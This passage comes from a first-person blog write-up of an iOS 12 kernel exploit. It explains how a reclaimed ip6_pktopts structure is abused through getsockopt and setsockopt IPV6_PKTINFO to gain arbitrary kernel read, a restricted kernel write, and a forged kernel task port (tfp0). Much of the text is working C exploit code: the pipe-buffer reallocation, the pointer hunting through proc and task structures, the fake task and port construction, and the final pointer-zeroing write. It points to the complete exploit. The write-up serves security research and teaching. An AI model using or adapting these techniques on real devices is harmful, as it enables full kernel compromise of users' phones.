. iOS devices are little endian machines, so the least significant byte is stored first with the rest of the data following it. What is the least significant byte here? It’s 0x01
, so optdatalen
will end up being 1
, which is seven bytes short of what we needed to read out the entire kernel pointer. If we used IPV6_NEXTHOP
with getsockopt
to read kernel memory, we would have to rely on the least significant byte of each piece of data we plan on reading from the kernel being greater than or equal to the size of each piece of said data. So a four byte read would require the least significant byte of those four bytes to be >= 4
and an eight byte read would require the least significant byte of those eight bytes to be >= 8
. Leaving the success of a kernel read to sheer luck kills reliability. We’re already past the risky reallocation part of the exploit, so nuking reliability again here isn’t ideal. IPV6_HOPOPTS
is useless.
For the options IPV6_HOPOPTS
, IPV6_RTHDR
, IPV6_RTHDRDSTOPTS
, and IPV6_DSTOPTS
, we can still control kaddr
because optdata
gets a pointer assigned to it, but optdatalen
still depends on the data pointed to by optdata
. The only difference with these options and IPV6_HOPOPTS
is the way optdatalen
gets calculated. It depends on pktopt->ip6po_<n>->ip6e_len
, so instead of using the least significant byte of what kaddr
points to, the byte after the least significant byte is used. Here is struct ip6_ext
:
struct ip6_ext {
u_int8_t ip6e_nxt;
u_int8_t ip6e_len;
} __attribute__((__packed__));
xnu-4903.221.2/bsd/netinet/ip6.h
The reason the byte after the least significant byte is used is because the offset of ip6e_len
is 1
, not 0
. To calculate optdatalen
those four options all use the same code:
optdatalen = (ip6e->ip6e_len + 1) << 3;
Since ip6e_len
is one byte, we can easily find the maximum and minimum values for ip6e_len
that produce good values for optdatalen
. If the byte after the least significant byte ends up being 0xff
, optdatalen
will be 0x800
, because (0xff + 1) << 3 == 0x800
. If that byte is 0
, optdatalen
will be 0x8
, because (0 + 1) << 3 == 0x8
. This is actually great for us because there’s no scenario where optdatalen
could end up being less than eight. My only issue with this is we’ll start reading huge chunks of kernel memory as that byte approaches the higher end, so there is the slight chance of hitting an unmapped region of memory, triggering a panic. Any four of these options would work for reading kernel memory, but we still have one more option to look at.
In a sea of annoying variations for optdatalen
, we have one option that breaks the status quo: IPV6_PKTINFO
(code simplified):
optdata = (void *)pktopt->ip6po_pktinfo;
optdatalen = sizeof (struct in6_pktinfo);
Again, since optdata
gets assigned to pktopt->ip6po_pktinfo
, a pointer that we control, we control copyout
’s kaddr
argument. pktopt->ip6po_pktinfo
would normally point to an in6_pktinfo
struct. optdatalen
is simply assigned to sizeof(struct in6_pktinfo)
. On an iPhone SE running iOS 12, sizeof(struct in6_pktinfo)
yields 20. This is what the assembly of the code above, followed by the call to copyout
, would look like:
LDR X0, [<Rn>, #<imm>] ; assume Rn = the pktopt parameter and imm is the offset of
; the ip6po_pktinfo field
; X0 = pktopt->ip6po_pktinfo (optdata, aka kaddr)
LDR X1, [<Rn>, #<imm>] ; assume Rn = the sopt parameter and imm is the offset of
; the sopt_val field
; X1 = sopt->sopt_val (uaddr)
MOV W2, #0x14 ; W2 = sizeof(struct in6_pktinfo) (optdatalen, aka len)
BL copyout
We can control X0
, the kaddr
argument to copyout
, and W2
, the len
parameter to copyout
, is simply 20! This is so much better than reading an unknown amount of kernel memory with the previous four options we were looking at. After a long time, we can finally get the kernel to copy out its memory with this code:
/* read out the old ip6_pktopts struct, update
* it for the kernel read, then shove it back
* into our evil pipe
*/
struct ip6_pktopts old_pktopts = {0};
read(evil_pipe[0], &old_pktopts, sizeof(old_pktopts));
struct ip6_pktopts new_pktopts = {0};
new_pktopts.ip6po_pktinfo = kaddr;
write(evil_pipe[1], &new_pktopts, sizeof(new_pktopts));
struct in6_pktinfo info = {0};
socklen_t infosz = sizeof(info);
getsockopt(evil_socket, IPPROTO_IPV6, IPV6_PKTINFO, &info, &infosz);
After the call to getsockopt
, info
will contain 20 bytes of kernel memory, starting from kaddr
. To me, reading 20 bytes at once is weird, so I only use the first eight bytes by saving *(uint64_t *)&info
into another variable.
Now that we have a way to read arbitrary kernel memory, we’re able to check if leaked_port
s ip_context
field is equal to 0x1122334455667788
, and if it is, we can start gathering the pointers we need for a fake tfp0.
Pointer hunting
Creating a fake kernel task port is a piece of cake. We need three pointers: the kernel’s ipc_space
, the kernel’s vm_map
, and a pointer to where a fake kernel task will reside. I’ll explain more about the fake kernel task when we get to it.
Kernel’s ipc_space
struct
Since this is the first pointer we’re going to find, we need to perform a bit of extra work. We need to find our task
structure in kernel memory in order to pull off a trick later that I learned from reading Siguza’s v0rtex writeup. Since we have the address of leaked_port
, it will be easy. Every Mach port has a receiver
field that keeps track of Mach messages that haven’t been received yet. receiver
is an ipc_space
struct, and that struct has a pointer to the owning task
structure. This would look something like uint64_t mytask_kaddr = leaked_port->data.receiver->is_task;
, but obviously it can’t be done that way because we are not in the kernel’s address space. It has to be done this way:
uint64_t myipcspace_kaddr = 0;
EarlyKernelRead64(leaked_port_kaddr + offsetof(kport_t, ip_receiver), &myipcspace_kaddr);
uint64_t mytask_kaddr = 0;
EarlyKernelRead64(myipcspace_kaddr + offsetof(struct ipc_space, is_task), &mytask_kaddr);
The EarlyKernelRead*
family of functions piggyback off the 20 byte kernel read we can do with getsockopt
.
Now that we’ve got the address of our task
struct, we can perform the trick I mentioned earlier. The task
structure has this field:
struct ipc_port *itk_registered[TASK_PORT_REGISTER_MAX];
xnu-4903.221.2/osfmk/kern/task.h
In xnu-4903.221.2
, TASK_PORT_REGISTER_MAX
is a macro that expands to 3
. We can write to this array with mach_ports_register
and read from it with mach_ports_lookup
. And since we already have the address of our task
struct, we can leak the address of any port we stash in that array. What we’re going to do is create an IOSurface
client, which is a Mach port name in userland, and register it with mach_ports_register
. Then we’ll leak the address of that port by reading ourtask->itk_registered[0]
. Since that port was created by the kernel, the receiver
field will be the kernel’s ipc_space
struct, so we finally have the first of the three pointers we need.
A tiny side note: it’s entirely possible to determine the kernel base and derive the kernel slide at this point. Since the IOSurface
client represents a C++ object, its kdata.kobject
field of is underlying ipc_port
will point to a C++ object. If we read the kdata.kobject
field and dereference it with another call to EarlyKernelRead64
, we’ll end up with a pointer to the first function of that C++ object’s vtable. Whatever that function is doesn’t matter, the only thing that matters is it will lie inside of the __text
section of the __TEXT_EXEC
segment. From there we can walk back until we see feedfacf
, the 64 bit mach-o magic, to get the kernel base. For the kernel slide, we subtract the kernel base we got from walking back with 0xfffffff007004000
. Having the kernel base/slide isn’t necessary for just making a fake kernel task port, but I thought I’d cover it anyway. Even if it serves no purpose for this exploit, it’s cool to have.
Kernel’s vm_map
struct
The second pointer we need is the kernel’s vm_map
structure. vm_map
is another field in the task
structure. Since we only have our task
struct, we need to find the kernel’s task
struct. For some reason, is_task
in the kernel’s ipc_space
struct is NULL
, so we can’t use that. Fortunately for us, the task
struct has a field, bsd_info
, that points to the corresponding proc
struct. We can get the address of our proc
struct by doing this:
uint64_t myproc_kaddr = 0;
EarlyKernelRead64(mytask_kaddr + TASK_BSDINFO_OFFSET, &myproc_kaddr);
struct proc
implements a doubly linked list at the beginning of the structure:
struct proc {
LIST_ENTRY(proc) p_list; /* List of all processes. */
void * task; /* corresponding task (static)*/
struct proc * p_pptr; /* Pointer to parent process.(LL) */
pid_t p_ppid; /* process's parent pid number */
pid_t p_pgrpid; /* process group id of the process (LL)*/
uid_t p_uid;
gid_t p_gid;
uid_t p_ruid;
gid_t p_rgid;
uid_t p_svuid;
gid_t p_svgid;
uint64_t p_uniqueid; /* process unique ID - incremented on fork/spawn/vfork, remains same across exec. */
uint64_t p_puniqueid; /* parent's unique ID - set on fork/spawn/vfork, doesn't change if reparented. */
lck_mtx_t p_mlock; /* mutex lock for proc */
pid_t p_pid; /* Process identifier. (static)*/
...
};
xnu-4903.221.2/bsd/sys/proc_internal.h
LIST_ENTRY(proc) p_list;
is a macro that expands to this:
struct {
struct proc *le_next; /* next element */
struct proc **le_prev; /* address of previous next element */
} p_list;
We’re able to iterate through all the proc
structs in the system by reading these pointers. All we have to do to find the kernel’s proc
struct is to loop backward through the list of processes. Interestingly enough, we don’t touch le_prev
to do this, we read le_next
. Yes, it’s counterintuitive, but if it works, it works. For every proc
struct we encounter, we’ll read its p_pid
field to check if it’s 0
. If it is, we found the kernel’s proc
struct. Here’s the code to do that:
uint64_t kernproc_kaddr = 0;
uint64_t curproc = myproc_kaddr;
for(;;){
uint32_t pid = -1;
EarlyKernelRead32(curproc + PROC_PID_OFFSET, &pid);
if(pid == 0){
kernproc_kaddr = curproc;
break;
}
EarlyKernelRead64(curproc, &curproc);
}
Now that we’ve got the kernel’s proc
struct, we can read its task
field for the kernel’s task
struct. Finally, from there, we can get a pointer to the kernel’s vm_map
. Two pointers down, one to go.
Fake kernel task
After iOS 10.3, Apple started to check against the real kernel task pointer, so we can’t hook kerntask_kaddr
up to our fake kernel task port. Instead, we can make our own with a pipe buffer:
int taskpipe[2];
pipe(taskpipe);
ktask_t faketask = {0};
faketask.lock.type = 0x22;
faketask.ref_count = 100;
faketask.active = 1;
faketask.map = kern_vmmap_kaddr;
write(taskpipe[1], &FAKE_TASK_PIPE_MAGIC, sizeof(FAKE_TASK_PIPE_MAGIC));
write(taskpipe[1], &faketask, sizeof(faketask));
FAKE_TASK_PIPE_MAGIC
is a magic number that will come in handy later. This is where the kernel’s vm_map
comes into play. The nastiest bug I ran into while developing this exploit had to do with this fake kernel task. That ktask_t
structure is only 40 bytes. It includes all the fields of struct task
up to and including map
because we don’t need to mess with anything after map
. The real task
structure is way larger than that. After I get tfp0 I test it by granting myself root, then restoring my original UID, GID, etc. That test would fail around 50% of the time, and it felt completely random. The pipe buffer is a normal kalloc
allocation, so the parts of that buffer I don’t use, including the rest of the fake task
struct, is initialized with whatever was there before. I forgot to zero out the remainder of the fake task pipe buffer! I don’t know what sizeof(struct task)
is, but it shouldn’t be more than 0x900
bytes:
char zerobuf[0x900] = {0};
write(taskpipe[1], zerobuf, sizeof(zerobuf));
After I did that, my tfp0 worked 100% of the time. Now we have to find where the address of fake task pipe buffer. This will be easy, as we already have the address of our proc
struct. To find the list of files for our process, we read the p_fd
field of our proc
struct. p_fd
is a filedesc
struct. struct filedesc
contains a dynamic array of open files, the fd_ofiles
field, and the number of open files, the fd_nfiles
field. We can iterate through that array, check if the current file is a pipe, and if it is, store its address. Since the address will be a pointer to a pipe
struct, we can read the first eight bytes of its pipe buffer, and if those eight bytes are equal to FAKE_TASK_PIPE_MAGIC
, we’ve found the pipe buffer that holds our fake kernel task. We’ll actually add sizeof(FAKE_TASK_PIPE_MAGIC)
to the address of the pipe buffer for the address of our fake kernel task.
We’ve got the three pointers we need, so what’s next? We still need to build our fake kernel task port. We won’t do that yet, however, for reasons that will become clear later.
Building an arbitrary kernel write
We are able to write to our freed struct with setsockopt
. setsockopt
takes similar options as getsockopt
, so we can quickly run through them to figure out what won’t work. We can eliminate IPV6_HOPLIMIT
, IPV6_TCLASS
, IPV6_USE_MIN_MTU
, IPV6_DONTFRAG
, and IPV6_PREFER_TEMPADDR
because like before, we cannot change the address of where our pipe buffer is. Those five options don’t deal with a pointer we can control. IPV6_NEXTHOP
, IPV6_HOPOPTS
, IPV6_DSTOPTS
, and IPV6_RTHDRDSTOPTS
do deal with a pointer we can control, but have permissions checks that will cause setsockopt
to return EACCES
. IPV6_RTHDR
doesn’t have a permission check, and we can control opt->ip6po_rthdr
, but once we get past all the parameter validation, the kernel allocates new memory and assigns it to opt->ip6po_rthdr
, which completely overwrites our controlled pointer. The last option is IPV6_PKTINFO
, so let’s check it out (comments omitted to shorten the code):
case IPV6_PKTINFO: {
struct ifnet *ifp = NULL;
struct in6_pktinfo *pktinfo;
if (len != sizeof (struct in6_pktinfo))
return (EINVAL);
pktinfo = (struct in6_pktinfo *)(void *)buf;
if (optname == IPV6_PKTINFO && opt->ip6po_pktinfo &&
pktinfo->ipi6_ifindex == 0 &&
IN6_IS_ADDR_UNSPECIFIED(&pktinfo->ipi6_addr)) {
ip6_clearpktopts(opt, optname);
break;
}
if (uproto == IPPROTO_TCP && optname == IPV6_PKTINFO &&
sticky && !IN6_IS_ADDR_UNSPECIFIED(&pktinfo->ipi6_addr)) {
return (EINVAL);
}
ifnet_head_lock_shared();
if (pktinfo->ipi6_ifindex > if_index) {
ifnet_head_done();
return (ENXIO);
}
if (pktinfo->ipi6_ifindex) {
ifp = ifindex2ifnet[pktinfo->ipi6_ifindex];
if (ifp == NULL) {
ifnet_head_done();
return (ENXIO);
}
}
ifnet_head_done();
if (opt->ip6po_pktinfo == NULL) {
opt->ip6po_pktinfo = _MALLOC(sizeof (*pktinfo),
M_IP6OPT, M_NOWAIT);
if (opt->ip6po_pktinfo == NULL)
return (ENOBUFS);
}
bcopy(pktinfo, opt->ip6po_pktinfo, sizeof (*pktinfo));
break;
}
xnu-4903.221.2/bsd/netinet6/ip6_output.c
After a ton of input validation, we hit a 20 byte bcopy
with opt->pktinfo
, which is a pointer we control. To take the codepath where we hit the bcopy
, we need to contruct our in6_pktinfo
struct so we get past all the input checks. This is struct in6_pktinfo
:
struct in6_pktinfo {
struct in6_addr ipi6_addr; /* src/dst IPv6 address */
unsigned int ipi6_ifindex; /* send/recv interface index */
};
xnu-4903.221.2/bsd/netinet6/in6.h
And this is struct in6_addr
:
typedef struct in6_addr {
union {
__uint8_t __u6_addr8[16];
__uint16_t __u6_addr16[8];
__uint32_t __u6_addr32[4];
} __u6_addr; /* 128-bit IP6 address */
} in6_addr_t;
xnu-4903.221.2/bsd/netinet6/in6.h
Let’s examine each if
statement to see our constraints.
if (len != sizeof (struct in6_pktinfo))
return (EINVAL);
No issue there, the optlen
parameter given to setsockopt
will be sizeof(struct in6_pktinfo)
.
if (optname == IPV6_PKTINFO && opt->ip6po_pktinfo &&
pktinfo->ipi6_ifindex == 0 &&
IN6_IS_ADDR_UNSPECIFIED(&pktinfo->ipi6_addr)) {
ip6_clearpktopts(opt, optname);
break;
}
optname
will be IPV6_PKTINFO
, and opt->ip6po_pktinfo
, our controlled pointer, will not be NULL
. If we want this check to fail, we’ll simply set pktinfo->ipi6_ifindex
to a nonzero value.
if (uproto == IPPROTO_TCP && optname == IPV6_PKTINFO &&
sticky && !IN6_IS_ADDR_UNSPECIFIED(&pktinfo->ipi6_addr)) {
return (EINVAL);
}
evil_socket
is a TCP socket, so uproto
will be IPPROTO_TCP
, and optname
will be IPV6_PKTINFO
. sticky
is a parameter to ip6_setpktopt
that will be 1
. It was passed by value inside of ip6_pcbopt
, which calls ip6_setpktopt
. The last condition, !IN6_IS_ADDR_UNSPECIFIED(&pktinfo->ipi6_addr)
, is what will determine if we bail with EINVAL
or not. IN6_IS_ADDR_UNSPECIFIED
is a macro which expands to this:
#define IN6_IS_ADDR_UNSPECIFIED(a) \
((*(const __uint32_t *)(const void *)(&(a)->s6_addr[0]) == 0) && \
(*(const __uint32_t *)(const void *)(&(a)->s6_addr[4]) == 0) && \
(*(const __uint32_t *)(const void *)(&(a)->s6_addr[8]) == 0) && \
(*(const __uint32_t *)(const void *)(&(a)->s6_addr[12]) == 0))
xnu-4903.221.2/bsd/netinet6/in6.h
s6_addr
is yet another macro that expands to __u6_addr.__u6_addr8
. It’s a lot of pointer insanity but it’s much simplier than it looks. See those __uint32_t
casts? That macro inteprets the bits at the address of every fourth byte of the in6_addr
struct as a 32 bit unsigned integer, then checks if said integer is equal to zero. So in order for the check !IN6_IS_ADDR_UNSPECIFIED(&pktinfo->ipi6_addr)
to fail, we need to zero out the ipi6_addr
member of the in6_pktinfo
struct we pass to setsockopt
.
if (pktinfo->ipi6_ifindex > if_index) {
ifnet_head_done();
return (ENXIO);
}
if_index
was incredibly annoying to track down. Turns out it’s a sysctl
variable representing the number of configured interfaces on the device. I’ll save you the pain of tracking it down yourself. I could not for the life of me figure out what this variable was initialized with, so I just brute forced nonzero values for the ipi6_ifindex
field to see when setsockopt
would return ENXIO
. Turns out the phone I was developing this exploit with has 15 configured interfaces. To get past this check, the ipi6_index
field of the in6_pktinfo
struct needs a value from 1-15, inclusive.
if (pktinfo->ipi6_ifindex) {
ifp = ifindex2ifnet[pktinfo->ipi6_ifindex];
if (ifp == NULL) {
ifnet_head_done();
return (ENXIO);
}
}
Since the ipi6_ifindex
field is nonzero, we enter this if
statement, but ifp
never ended up being NULL
for the range of values I described earlier.
if (opt->ip6po_pktinfo == NULL) {
opt->ip6po_pktinfo = _MALLOC(sizeof (*pktinfo),
M_IP6OPT, M_NOWAIT);
if (opt->ip6po_pktinfo == NULL)
return (ENOBUFS);
}
This checks if our controlled pointer is NULL
, and it won’t ever be.
Finally we hit that bcopy
, where we can write to a controlled address in the kernel.
Creating a fake kernel task port
Things are looking bleak. Out of the 20 bytes our in6_pktinfo
struct is comprised of, 19 of them must be zero. The only byte we have a bit of freedom with is the least significant byte of the ipi6_ifindex
field, which must be anything from 1 to 15. For a day I was really annoyed with this. I was so close to finishing it but I felt finished off by Apple. But then I remembered something: ARMv8 requires that instructions are word aligned (a word in ARMv8 is 32 bits), so shouldn’t the concept of alignment apply to data as well? The ARMv8 reference manual states:
For all instructions that load or store single or multiple registers, but not Load-Exclusive, Store-Exclusive, Load-Acquire/Store-Release and Atomic instructions, if the address that is accessed is not aligned to the size of the data element being accessed, then:
When the value of SCTLR_ELx.A applicable to the current Exception level is 1, an Alignment fault is generated.
By that logic, if a four byte integer were to be loaded from a register, that register must hold a word aligned pointer to that integer, and if an eight byte pointer were to be loaded from a register, that register must hold a doubleword aligned pointer to that pointer. If something is word aligned, that means its bottom two bits are zero’ed out. If something is doubleword aligned, that means its bottom three bits are zero’ed out. Let’s go a bit further than this. Through experimentation I noticed that page sized pipe buffer allocations are page aligned. It sounds obvious, but at the time I wasn’t considering alignments larger than 128 bits (quadword). The page size of the phone I was developing this exploit on is 0x4000
. In my case, if a pointer is page aligned, at the very least its bottom 14 bits will always be zero’ed out. This is where being able to write a bunch of zeros will come in handy. If we get a pointer to a Mach port and a pointer to a page aligned pipe buffer with the same upper 48 bits, we can use our kernel write to zero out the bottom 16 bits of the Mach port pointer to instead make it point to a controlled pipe buffer. But why do the upper 48 bits have to match instead of the upper 50? I did say that a page aligned allocation will have its bottom 14 bits zeroed out, but with the crappy kernel write primitive we have, it’s much easier to write two bytes worth of zeros instead of one zero byte and whatever the next byte would be with its bottom six bits zero’ed out.
This is why we didn’t create the pipe to hold our fake kernel task port yet. In order to increase our chances of getting a pipe buffer and Mach port pointer with the same upper 48 bits, we’re going to alternate allocating them. We’ll create 250 each, making each pipe buffer a kalloc.16384
(16384
== 0x4000
) allocation and granting each Mach port a send right for mach_ports_register
later. The Mach ports will be held in an array called colliderports
and the pipes in an array called colliderpipes
. For each pipe buffer, we’ll append a short “header”. At pipe buffer + 0
, we’ll write the device’s page size, and at pipe buffer + 4
, we’ll write the index of where it resides in the colliderpipes
array. After, we’ll loop through each Mach port, register it, read mytask_kaddr->itk_registered[0]
for its pointer, then loop through each pipe buffer pointer and check if the upper 48 bits are identical for both. If they are, we’ve found our tfp0pipe
and soon to be tfp0
port. If they aren’t, we unregister the current Mach port and go again.
Now that we have our tfp0pipe
, we can shove a fake kernel task port into its pipe buffer. But first we need to read out the crap that was shoved in it before to make it a page sized kalloc
allocation:
kport_t ktfp0 = {0};
ktfp0.ip_bits = io_makebits(1, IOT_PORT, IKOT_TASK);
ktfp0.ip_references = 100;
ktfp0.ip_lock.type = 0x11;
ktfp0.ip_receiver = kern_ipc_space_kaddr;
ktfp0.ip_kobject = faketask_kaddr;
ktfp0.ip_srights = 99;
/* get rid of the stuff we sent to the pipe to create the initial pipe buffer... */
char junkbuf[colliderkzone - 1];
read(tfp0pipe[0], junkbuf, sizeof(junkbuf));
/* ...and replace it with our fake tfp0 */
write(tfp0pipe[1], &ktfp0, sizeof(ktfp0));
The only thing left to do is make our userland tfp0
port actually point to the tfp0pipe
pipe buffer. Let’s step back for a moment and think about how the number that represents the tfp0
port in userland is used in the kernel. A Mach port name in userland is made up of two parts: a generation number and an index. The generation number isn’t important to us, but the index is. That index represents a spot in the table of our processes’ Mach ports in kernel space. The index is bits 8 to 31, so we can figure out where our userland tfp0
sits in our Mach port table by shifting tfp0
to the right by eight bits. To access our table, we can read the is_table
field of our ipc_space
struct. The is_table
is an array of struct ipc_entry
, which looks like this:
struct ipc_entry {
struct ipc_object *ie_object;
ipc_entry_bits_t ie_bits;
mach_port_index_t ie_index;
union {
mach_port_index_t next; /* next in freelist, or... */
ipc_table_index_t request; /* dead name request notify */
} index;
};
xnu-4903.221.2/osfmk/kern/ipc_entry.h
The ie_object
field is a pointer to the associated Mach port. Getting the ipc_entry
struct for our userland tfp0
port is a piece of cake:
uint32_t tfp0_portidx = tfp0 >> 8;
tfp0_portidx *= sizeof(struct ipc_entry);
uint64_t baseaddr = myipcspace.is_table + tfp0_portidx;
baseaddr
is the address of tfp0
’s ie_object
. In order to set up this write correctly, we subtract 18 from baseaddr
because we’re only using the last two bytes of an in6_pktinfo
struct to zero ie_object
’s bottom 16 bits out. But because of that, we’re going to obliterate the 18 bytes of memory before this pointer. This isn’t much of an issue; we’ll just save those 18 bytes before the write. We set the ip6po_pktinfo
field of our reallocated ip6_pktopts
struct to baseaddr
, call setsockopt
with evil_socket
, IPV6_PKTINFO
, and our crafted in6_pktinfo
struct, and after setsockopt
returns, tfp0
is a fully functional, but fake, kernel task port! The only thing left to do is restore the 18 bytes we saved before the write, which we can easily do with a call to vm_write
.
You can find the complete code for the exploit here.
Final Thoughts
I believe the real reason I did not get into iOS exploit dev earlier is because I was afraid of failing. Repeatedly getting “sucked back into the debugger” was an excuse to avoid pursuing what I am really interested in and passionate about. Exploitation used to be like black magic to me. Now it’s more of “because I know how this aspect of iOS/XNU works, I can make the machine do what I want it to do”. I can’t wait to see what the coming years will bring.
If you would like a list of resources I used to learn to write my first exploit, check out the README for that linked repository. What I learned from those resources served me well for this exploit.
If you have any questions, the best way of getting in touch with me is to contact me on Twitter. I’m also on Discord, Justin#6010, but I rarely check it.